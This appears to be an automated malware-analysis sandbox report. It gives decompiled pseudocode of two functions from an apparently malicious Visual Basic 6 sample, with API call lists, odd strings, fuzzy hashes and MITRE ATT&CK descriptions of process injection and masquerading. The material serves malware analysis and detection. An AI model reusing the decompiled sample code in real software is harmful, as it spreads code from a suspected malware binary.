Associated: 00000006.00000002.684299733.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ListMove$CheckHresult$#613#617#680#703#714ChkstkConstruct2DestructErrorNew2
String ID: 1:1:1
API String ID: 2873038774-2485858058
Opcode ID: d91ecd98f900f203c2a381a46f345686993e7aecdd47ae972efaf7fb67fa4240
Instruction ID: 608f813519322b975b928f2bee60923d592f10b58c1caef68890ac9d73a7c2d0
Opcode Fuzzy Hash: d91ecd98f900f203c2a381a46f345686993e7aecdd47ae972efaf7fb67fa4240
Instruction Fuzzy Hash: 9512D771801218DAEB20EB95CC45BEDB7B4FF15309F1046EEE109B72A1DB781A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00419AD2, Relevance: 82.7, APIs: 44, Strings: 3, Instructions: 429
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00419AD2(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long long _v32;
				intOrPtr _v36;
				void* _v52;
				void* _v56;
				short _v60;
				void* _v64;
				short _v68;
				signed int _v72;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				intOrPtr _v132;
				intOrPtr _v140;
				intOrPtr _v148;
				char _v156;
				void* _v176;
				signed int _v180;
				signed int _v184;
				void* _v188;
				signed int _v192;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				signed int _v236;
				intOrPtr* _v240;
				signed int _v244;
				signed int _v248;
				intOrPtr* _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				signed long long _v276;
				signed int _v280;
				signed int _t229;
				signed int _t231;
				signed int _t234;
				char* _t235;
				signed int _t241;
				signed int _t245;
				signed int _t251;
				signed int _t256;
				signed int _t263;
				signed int _t268;
				signed int _t275;
				signed int _t280;
				signed int _t284;
				signed int _t290;
				signed int _t295;
				char* _t317;
				void* _t327;
				void* _t329;
				intOrPtr _t330;
				intOrPtr* _t331;
				long long _t355;

				_t330 = _t329 - 0xc;
				 *[fs:0x0] = _t330;
				L004011C0();
				_v16 = _t330;
				_v12 = 0x401188;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t327);
				_v132 = 0x402efc;
				_v140 = 8;
				L004012D4();
				_push( &_v108);
				_t229 =  &_v92;
				_push(_t229);
				L004012DA();
				_v180 = _t229;
				if(_v180 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(_v180);
					L004012CE();
					_v212 = _t229;
				}
				_v148 = 2;
				_v156 = 0x8002;
				_push( &_v108);
				_t231 =  &_v156;
				_push(_t231);
				L004012E0();
				_v184 = _t231;
				_push( &_v108);
				_push( &_v92);
				_push(2);
				L004012EC();
				_t331 = _t330 + 0xc;
				_t234 = _v184;
				if(_t234 != 0) {
					L004012C8();
					if( *0x41c614 != 0) {
						_v216 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v216 = 0x41c614;
					}
					_v180 =  *_v216;
					_t290 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
					asm("fclex");
					_v184 = _t290;
					if(_v184 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402ec8);
						_push(_v180);
						_push(_v184);
						L00401352();
						_v220 = _t290;
					}
					_v188 = _v76;
					_t295 =  *((intOrPtr*)( *_v188 + 0x58))(_v188,  &_v72);
					asm("fclex");
					_v192 = _t295;
					if(_v192 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x402ee8);
						_push(_v188);
						_push(_v192);
						L00401352();
						_v224 = _t295;
					}
					_v204 = _v72;
					_v72 = _v72 & 0x00000000;
					L00401322();
					_t317 =  &_v76;
					L0040132E();
					_v116 = 0x80020004;
					_v124 = 0xa;
					_v100 = 0x80020004;
					_v108 = 0xa;
					_v84 = 0x80020004;
					_v92 = 0xa;
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_t355 =  *0x401150;
					_push(_t317);
					_push(_t317);
					_v92 = _t355;
					asm("fld1");
					_push(_t317);
					_push(_t317);
					_v100 = _t355;
					asm("fld1");
					_push(_t317);
					_push(_t317);
					_v108 = _t355;
					L004012F2();
					_v32 = _t355;
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push(3);
					L004012EC();
					_t331 = _t331 + 0x10;
					L004012C8();
					_push(0);
					_push(L"Feverroot3");
					_push( &_v92);
					L0040133A();
					_t234 = 0x10;
					L004011C0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v36);
					L004012C2();
					L00401334();
				}
				_push(2);
				_push("ABC");
				_push(0x402f2c);
				_push(0);
				L004012BC();
				if(_t234 != 5) {
					if( *0x41c614 != 0) {
						_v228 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v228 = 0x41c614;
					}
					_v180 =  *_v228;
					_t241 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
					asm("fclex");
					_v184 = _t241;
					if(_v184 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402ec8);
						_push(_v180);
						_push(_v184);
						L00401352();
						_v232 = _t241;
					}
					_v188 = _v76;
					_t245 =  *((intOrPtr*)( *_v188 + 0x138))(_v188, L"Morwong4", 1);
					asm("fclex");
					_v192 = _t245;
					if(_v192 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x402ee8);
						_push(_v188);
						_push(_v192);
						L00401352();
						_v236 = _t245;
					}
					L0040132E();
					if( *0x41c614 != 0) {
						_v240 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v240 = 0x41c614;
					}
					_v180 =  *_v240;
					_t251 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
					asm("fclex");
					_v184 = _t251;
					if(_v184 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402ec8);
						_push(_v180);
						_push(_v184);
						L00401352();
						_v244 = _t251;
					}
					_v188 = _v76;
					_t256 =  *((intOrPtr*)( *_v188 + 0x130))(_v188,  &_v72);
					asm("fclex");
					_v192 = _t256;
					if(_v192 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x402ee8);
						_push(_v188);
						_push(_v192);
						L00401352();
						_v248 = _t256;
					}
					_v208 = _v72;
					_v72 = _v72 & 0x00000000;
					L00401322();
					L0040132E();
					if( *0x41c614 != 0) {
						_v252 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v252 = 0x41c614;
					}
					_v180 =  *_v252;
					_t263 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
					asm("fclex");
					_v184 = _t263;
					if(_v184 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402ec8);
						_push(_v180);
						_push(_v184);
						L00401352();
						_v256 = _t263;
					}
					_v188 = _v76;
					_t268 =  *((intOrPtr*)( *_v188 + 0xc0))(_v188,  &_v176);
					asm("fclex");
					_v192 = _t268;
					if(_v192 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x402ee8);
						_push(_v188);
						_push(_v192);
						L00401352();
						_v260 = _t268;
					}
					_v68 = _v176;
					L0040132E();
					if( *0x41c614 != 0) {
						_v264 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v264 = 0x41c614;
					}
					_v180 =  *_v264;
					_t275 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
					asm("fclex");
					_v184 = _t275;
					if(_v184 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402ec8);
						_push(_v180);
						_push(_v184);
						L00401352();
						_v268 = _t275;
					}
					_v188 = _v76;
					_t280 =  *((intOrPtr*)( *_v188 + 0xc8))(_v188,  &_v176);
					asm("fclex");
					_v192 = _t280;
					if(_v192 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x402ee8);
						_push(_v188);
						_push(_v192);
						L00401352();
						_v272 = _t280;
					}
					_v60 = _v176;
					L0040132E();
					_v276 =  *0x401180 *  *0x401178;
					 *_t331 = _v276;
					_t284 =  *((intOrPtr*)( *_a4 + 0x84))(_a4,  &_v76);
					asm("fclex");
					_v180 = _t284;
					if(_v180 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x402d14);
						_push(_a4);
						_push(_v180);
						L00401352();
						_v280 = _t284;
					}
				}
				_t235 =  &_v92;
				_push(_t235);
				L004012B0();
				L004012B6();
				asm("wait");
				_push(0x41a231);
				L0040132E();
				L00401334();
				L00401310();
				L00401310();
				return _t235;
			}

0x00419ad5
0x00419ae4
0x00419af0
0x00419af8
0x00419afb
0x00419b02
0x00419b11
0x00419b14
0x00419b1b
0x00419b2e
0x00419b36
0x00419b37
0x00419b3a
0x00419b3b
0x00419b40
0x00419b4d
0x00419b62
0x00419b4f
0x00419b4f
0x00419b55
0x00419b5a
0x00419b5a
0x00419b69
0x00419b73
0x00419b80
0x00419b81
0x00419b87
0x00419b88
0x00419b8d
0x00419b97
0x00419b9b
0x00419b9c
0x00419b9e
0x00419ba3
0x00419ba6
0x00419baf
0x00419bb5
0x00419bc1
0x00419bde
0x00419bc3
0x00419bc3
0x00419bc8
0x00419bcd
0x00419bd2
0x00419bd2
0x00419bf0
0x00419c08
0x00419c0b
0x00419c0d
0x00419c1a
0x00419c3c
0x00419c1c
0x00419c1c
0x00419c1e
0x00419c23
0x00419c29
0x00419c2f
0x00419c34
0x00419c34
0x00419c46
0x00419c5e
0x00419c61
0x00419c63
0x00419c70
0x00419c92
0x00419c72
0x00419c72
0x00419c74
0x00419c79
0x00419c7f
0x00419c85
0x00419c8a
0x00419c8a
0x00419c9c
0x00419ca2
0x00419caf
0x00419cb4
0x00419cb7
0x00419cbc
0x00419cc3
0x00419cca
0x00419cd1
0x00419cd8
0x00419cdf
0x00419ce9
0x00419ced
0x00419cf1
0x00419cf2
0x00419cf8
0x00419cf9
0x00419cfa
0x00419cfd
0x00419cff
0x00419d00
0x00419d01
0x00419d04
0x00419d06
0x00419d07
0x00419d08
0x00419d0b
0x00419d10
0x00419d16
0x00419d1a
0x00419d1e
0x00419d1f
0x00419d21
0x00419d26
0x00419d29
0x00419d2e
0x00419d30
0x00419d38
0x00419d39
0x00419d40
0x00419d41
0x00419d4b
0x00419d4c
0x00419d4d
0x00419d4e
0x00419d4f
0x00419d51
0x00419d54
0x00419d5c
0x00419d5c
0x00419d61
0x00419d63
0x00419d68
0x00419d6d
0x00419d6f
0x00419d77
0x00419d84
0x00419da1
0x00419d86
0x00419d86
0x00419d8b
0x00419d90
0x00419d95
0x00419d95
0x00419db3
0x00419dcb
0x00419dce
0x00419dd0
0x00419ddd
0x00419dff
0x00419ddf
0x00419ddf
0x00419de1
0x00419de6
0x00419dec
0x00419df2
0x00419df7
0x00419df7
0x00419e09
0x00419e24
0x00419e2a
0x00419e2c
0x00419e39
0x00419e5e
0x00419e3b
0x00419e3b
0x00419e40
0x00419e45
0x00419e4b
0x00419e51
0x00419e56
0x00419e56
0x00419e68
0x00419e74
0x00419e91
0x00419e76
0x00419e76
0x00419e7b
0x00419e80
0x00419e85
0x00419e85
0x00419ea3
0x00419ebb
0x00419ebe
0x00419ec0
0x00419ecd
0x00419eef
0x00419ecf
0x00419ecf
0x00419ed1
0x00419ed6
0x00419edc
0x00419ee2
0x00419ee7
0x00419ee7
0x00419ef9
0x00419f11
0x00419f17
0x00419f19
0x00419f26
0x00419f4b
0x00419f28
0x00419f28
0x00419f2d
0x00419f32
0x00419f38
0x00419f3e
0x00419f43
0x00419f43
0x00419f55
0x00419f5b
0x00419f68
0x00419f70
0x00419f7c
0x00419f99
0x00419f7e
0x00419f7e
0x00419f83
0x00419f88
0x00419f8d
0x00419f8d
0x00419fab
0x00419fc3
0x00419fc6
0x00419fc8
0x00419fd5
0x00419ff7
0x00419fd7
0x00419fd7
0x00419fd9
0x00419fde
0x00419fe4
0x00419fea
0x00419fef
0x00419fef
0x0041a001
0x0041a01c
0x0041a022
0x0041a024
0x0041a031
0x0041a056
0x0041a033
0x0041a033
0x0041a038
0x0041a03d
0x0041a043
0x0041a049
0x0041a04e
0x0041a04e
0x0041a064
0x0041a06b
0x0041a077
0x0041a094
0x0041a079
0x0041a079
0x0041a07e
0x0041a083
0x0041a088
0x0041a088
0x0041a0a6
0x0041a0be
0x0041a0c1
0x0041a0c3
0x0041a0d0
0x0041a0f2
0x0041a0d2
0x0041a0d2
0x0041a0d4
0x0041a0d9
0x0041a0df
0x0041a0e5
0x0041a0ea
0x0041a0ea
0x0041a0fc
0x0041a117
0x0041a11d
0x0041a11f
0x0041a12c
0x0041a151
0x0041a12e
0x0041a12e
0x0041a133
0x0041a138
0x0041a13e
0x0041a144
0x0041a149
0x0041a149
0x0041a15f
0x0041a166
0x0041a177
0x0041a184
0x0041a18f
0x0041a195
0x0041a197
0x0041a1a4
0x0041a1c6
0x0041a1a6
0x0041a1a6
0x0041a1ab
0x0041a1b0
0x0041a1b3
0x0041a1b9
0x0041a1be
0x0041a1be
0x0041a1a4
0x0041a1cd
0x0041a1d0
0x0041a1d1
0x0041a1dc
0x0041a1e1
0x0041a1e2
0x0041a213
0x0041a21b
0x0041a223
0x0041a22b
0x0041a230

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 00419AF0
__vbaVarDup.MSVBVM60 ref: 00419B2E
#564.MSVBVM60(?,?), ref: 00419B3B
__vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00419B55
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 00419B88
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 00419B9E
#554.MSVBVM60(?,?,004011C6), ref: 00419BB5
__vbaNew2.MSVBVM60(00402ED8,0041C614,?,?,004011C6), ref: 00419BCD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 00419C2F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,00000058), ref: 00419C85
__vbaStrMove.MSVBVM60(00000000,?,00402EE8,00000058), ref: 00419CAF
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,00000058), ref: 00419CB7
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00419D0B
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00419D21
#554.MSVBVM60(?,?,?,?,?,?,004011C6), ref: 00419D29
#716.MSVBVM60(?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D39
__vbaChkstk.MSVBVM60(?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D41
__vbaLateIdSt.MSVBVM60(?,00000000,?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D54
__vbaFreeVar.MSVBVM60(?,00000000,?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D5C
__vbaInStrB.MSVBVM60(00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 00419D6F
__vbaNew2.MSVBVM60(00402ED8,0041C614,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 00419D90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 00419DF2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,00000138), ref: 00419E51
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,00000138), ref: 00419E68
__vbaNew2.MSVBVM60(00402ED8,0041C614), ref: 00419E80
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 00419EE2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,00000130), ref: 00419F3E
__vbaStrMove.MSVBVM60(00000000,?,00402EE8,00000130), ref: 00419F68
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,00000130), ref: 00419F70
__vbaNew2.MSVBVM60(00402ED8,0041C614), ref: 00419F88
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 00419FEA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,000000C0), ref: 0041A049
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,000000C0), ref: 0041A06B
__vbaNew2.MSVBVM60(00402ED8,0041C614), ref: 0041A083
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 0041A0E5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,000000C8), ref: 0041A144
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,000000C8), ref: 0041A166
__vbaHresultCheckObj.MSVBVM60(00000000,00401188,00402D14,00000084), ref: 0041A1B9
#546.MSVBVM60(?,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 0041A1D1
__vbaVarMove.MSVBVM60(?,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 0041A1DC
__vbaFreeObj.MSVBVM60(0041A231,?,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 0041A213
__vbaFreeVar.MSVBVM60(0041A231,?,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 0041A21B
__vbaFreeStr.MSVBVM60(0041A231,?,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 0041A223
__vbaFreeStr.MSVBVM60(0041A231,?,00000000,00402F2C,ABC,00000002,?,?,004011C6), ref: 0041A22B

Strings

ABC, xrefs: 00419D63
Morwong4, xrefs: 00419E11
Feverroot3, xrefs: 00419D30

Memory Dump Source

Source File: 00000006.00000002.684240905.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.684232870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.684280739.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684292158.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684299733.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$Move$#554ChkstkList$#546#564#680#716Late
String ID: ABC$Feverroot3$Morwong4
API String ID: 4004030552-2891085420
Opcode ID: 493c212c198127722ada45016788bd656c05311bc3e5d32d2e06bc15bacd3ad5
Instruction ID: c2216f7374b44e6d6e663ad766af991daf5508ce9d1a0b9e3952de78ef8c06e7
Opcode Fuzzy Hash: 493c212c198127722ada45016788bd656c05311bc3e5d32d2e06bc15bacd3ad5
Instruction Fuzzy Hash: DA12E270940228DFDB20EF90CC85BDDBBB5BB18305F1040EAE109B62A1D7785AC5DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041979B, Relevance: 31.7, APIs: 21, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041979B(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				long long _v48;
				signed int _v52;
				signed int _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				char* _t92;
				signed int _t98;
				signed int _t103;
				signed int _t118;
				char* _t127;
				void* _t134;
				void* _t136;
				intOrPtr _t137;
				long long _t146;
				long long _t147;

				_t137 = _t136 - 0xc;
				 *[fs:0x0] = _t137;
				L004011C0();
				_v16 = _t137;
				_v12 = 0x401168;
				_v8 = 0;
				_t92 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t134);
				_t146 =  *0x401160;
				L0040123E();
				L0040130A();
				asm("fcomp qword [0x401158]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x41c614 != 0) {
						_v188 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v188 = 0x41c614;
					}
					_v156 =  *_v188;
					_t98 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v56);
					asm("fclex");
					_v160 = _t98;
					if(_v160 >= 0) {
						_t20 =  &_v192;
						 *_t20 = _v192 & 0x00000000;
						__eflags =  *_t20;
					} else {
						_push(0x14);
						_push(0x402ec8);
						_push(_v156);
						_push(_v160);
						L00401352();
						_v192 = _t98;
					}
					_v164 = _v56;
					_t103 =  *((intOrPtr*)( *_v164 + 0x110))(_v164,  &_v52);
					asm("fclex");
					_v168 = _t103;
					if(_v168 >= 0) {
						_t33 =  &_v196;
						 *_t33 = _v196 & 0x00000000;
						__eflags =  *_t33;
					} else {
						_push(0x110);
						_push(0x402ee8);
						_push(_v164);
						_push(_v168);
						L00401352();
						_v196 = _t103;
					}
					_v180 = _v52;
					_v52 = _v52 & 0x00000000;
					L00401322();
					L0040132E();
					_v64 = 0x80020004;
					_v72 = 0xa;
					_push( &_v72);
					L004012FE();
					_v32 = _t146;
					L00401334();
					L004012F8();
					_t127 =  &_v36;
					L00401322();
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t147 =  *0x401150;
					_push(_t127);
					_push(_t127);
					_v80 = _t147;
					asm("fld1");
					_push(_t127);
					_push(_t127);
					_v88 = _t147;
					asm("fld1");
					_push(_t127);
					_push(_t127);
					_v96 = _t147;
					L004012F2();
					_v48 = _t147;
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push(3);
					L004012EC();
					if( *0x41c614 != 0) {
						_v200 = 0x41c614;
					} else {
						_push(0x41c614);
						_push(0x402ed8);
						L00401304();
						_v200 = 0x41c614;
					}
					_v156 =  *_v200;
					_v112 = 0x8f;
					_v120 = 2;
					L004011C0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t118 =  *((intOrPtr*)( *_v156 + 0x34))(_v156, 0x10, 0x6729,  &_v56);
					asm("fclex");
					_v160 = _t118;
					if(_v160 >= 0) {
						_t77 =  &_v204;
						 *_t77 = _v204 & 0x00000000;
						__eflags =  *_t77;
					} else {
						_push(0x34);
						_push(0x402ec8);
						_push(_v156);
						_push(_v160);
						L00401352();
						_v204 = _t118;
					}
					_v184 = _v56;
					_v56 = _v56 & 0x00000000;
					_push(_v184);
					_t92 =  &_v28;
					_push(_t92);
					L004012E6();
				}
				asm("wait");
				_push(0x419ab3);
				L0040132E();
				L00401310();
				L00401310();
				return _t92;
			}

0x0041979e
0x004197ad
0x004197b9
0x004197c1
0x004197c4
0x004197cb
0x004197da
0x004197dd
0x004197e3
0x004197e8
0x004197ed
0x004197f3
0x004197f5
0x004197f6
0x00419803
0x00419820
0x00419805
0x00419805
0x0041980a
0x0041980f
0x00419814
0x00419814
0x00419832
0x0041984a
0x0041984d
0x0041984f
0x0041985c
0x0041987e
0x0041987e
0x0041987e
0x0041985e
0x0041985e
0x00419860
0x00419865
0x0041986b
0x00419871
0x00419876
0x00419876
0x00419888
0x004198a0
0x004198a6
0x004198a8
0x004198b5
0x004198da
0x004198da
0x004198da
0x004198b7
0x004198b7
0x004198bc
0x004198c1
0x004198c7
0x004198cd
0x004198d2
0x004198d2
0x004198e4
0x004198ea
0x004198f7
0x004198ff
0x00419904
0x0041990b
0x00419915
0x00419916
0x0041991b
0x00419921
0x00419926
0x0041992d
0x00419930
0x00419935
0x0041993c
0x00419943
0x0041994a
0x00419951
0x00419958
0x00419962
0x00419966
0x0041996a
0x0041996b
0x00419971
0x00419972
0x00419973
0x00419976
0x00419978
0x00419979
0x0041997a
0x0041997d
0x0041997f
0x00419980
0x00419981
0x00419984
0x00419989
0x0041998f
0x00419993
0x00419997
0x00419998
0x0041999a
0x004199a9
0x004199c6
0x004199ab
0x004199ab
0x004199b0
0x004199b5
0x004199ba
0x004199ba
0x004199d8
0x004199de
0x004199e5
0x004199f8
0x00419a02
0x00419a03
0x00419a04
0x00419a05
0x00419a14
0x00419a17
0x00419a19
0x00419a26
0x00419a48
0x00419a48
0x00419a48
0x00419a28
0x00419a28
0x00419a2a
0x00419a2f
0x00419a35
0x00419a3b
0x00419a40
0x00419a40
0x00419a52
0x00419a58
0x00419a5c
0x00419a62
0x00419a65
0x00419a66
0x00419a66
0x00419a6b
0x00419a6c
0x00419a9d
0x00419aa5
0x00419aad
0x00419ab2

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 004197B9
_CIsqrt.MSVBVM60(?,?,?,?,004011C6), ref: 004197E3
__vbaFpR8.MSVBVM60(?,?,?,?,004011C6), ref: 004197E8
__vbaNew2.MSVBVM60(00402ED8,0041C614,?,?,?,?,004011C6), ref: 0041980F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000014), ref: 00419871
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EE8,00000110), ref: 004198CD
__vbaStrMove.MSVBVM60(00000000,?,00402EE8,00000110), ref: 004198F7
__vbaFreeObj.MSVBVM60(00000000,?,00402EE8,00000110), ref: 004198FF
#593.MSVBVM60(0000000A), ref: 00419916
__vbaFreeVar.MSVBVM60(0000000A), ref: 00419921
#611.MSVBVM60(0000000A), ref: 00419926
__vbaStrMove.MSVBVM60(0000000A), ref: 00419930
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A,0000000A), ref: 00419984
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A,0000000A), ref: 0041999A
__vbaNew2.MSVBVM60(00402ED8,0041C614,?,?,?,004011C6), ref: 004199B5
__vbaChkstk.MSVBVM60(00006729,?), ref: 004199F8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000034), ref: 00419A3B
__vbaObjSet.MSVBVM60(?,?), ref: 00419A66
__vbaFreeObj.MSVBVM60(00419AB3,?,?,?,?,004011C6), ref: 00419A9D
__vbaFreeStr.MSVBVM60(00419AB3,?,?,?,?,004011C6), ref: 00419AA5
__vbaFreeStr.MSVBVM60(00419AB3,?,?,?,?,004011C6), ref: 00419AAD

Memory Dump Source

Source File: 00000006.00000002.684240905.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.684232870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.684280739.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684292158.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684299733.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkMoveNew2$#593#611#680IsqrtList
String ID:
API String ID: 3995339711-0
Opcode ID: e28e1981b13127810128853798dfa3b0319f705363c00106ccb0b886153ba73a
Instruction ID: f1b19cc63eb73ab037337d9f8d0f611dcde92fe7c8e9638a8f8037eedb4e54de
Opcode Fuzzy Hash: e28e1981b13127810128853798dfa3b0319f705363c00106ccb0b886153ba73a
Instruction Fuzzy Hash: 9A811671950218EFDB10EFA1CD85BDDB7B5BF09304F1040AAE509BB2A1C7785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

